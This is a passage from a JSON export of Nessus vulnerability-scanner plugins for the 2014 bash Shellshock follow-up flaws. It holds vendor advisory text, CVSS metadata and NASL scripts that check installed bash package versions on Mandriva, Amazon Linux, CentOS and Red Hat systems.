Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the\nupstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which\nresolves various bugs.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-4.2-48.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-doc-4.2-48.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:15", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not 
otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with new bash packages that also fix both CVE-2014-7169 and CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, 'bash-4.1.2-15.21.amzn1' also addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories, 'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash package.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bash (ALAS-2014-419)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bash", "p-cpe:/a:amazon:linux:bash-debuginfo", "p-cpe:/a:amazon:linux:bash-doc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-419.NASL", "href": 
"https://www.tenable.com/plugins/nessus/78362", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-419.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78362);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"ALAS\", value:\"2014-419\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Amazon Linux AMI : bash (ALAS-2014-419)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"GNU Bash through 4.3 bash43-025 processes trailing strings after\ncertain malformed function definitions in the values of environment\nvariables, which allows remote attackers to write to files or possibly\nhave unknown other impact via a crafted environment, as demonstrated\nby vectors involving the ForceCommand feature in OpenSSH sshd, the\nmod_cgi and mod_cgid modules in the Apache HTTP Server, scripts\nexecuted by unspecified DHCP clients, and other situations in which\nsetting the environment occurs across a privilege boundary from Bash\nexecution.\n\nNOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. 
Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI\nrepositories with new bash packages that also fix both CVE-2014-7169\nand CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both\nCVEs. Running 'yum clean all' followed by 'yum update bash' will\ninstall the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories,\n'bash-4.1.2-15.21.amzn1' also addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories,\n'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09\nrepositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash\npackage.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-418.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-419.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update bash' to update your system. 
Note that you may need to\nrun 'yum clean all' first.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"bash-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"bash-debuginfo-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-doc-4.1.2-15.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:23", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. 
For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# CentOS Errata and Security Advisory 2014:1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77879);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. 
For more information see the Knowledgebase\narticle at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e6f3298\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dcec836\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020651.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d96a66d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:centos:centos:7\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/CentOS/release\");\nif (! version) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (ereg(string:version, pattern:\"release 5\\.([0-9]([^0-9]|$)|10([^0-9]|$))\", icase: 1))\n{\n #CentOS release 5.0-5.10\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_10.4\")) flag++;\n}\nelse \n{\n #CentOS release 5.11\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n}\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": 
{"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:25", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. 
For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77895);\n script_version(\"1.38\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1306\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if 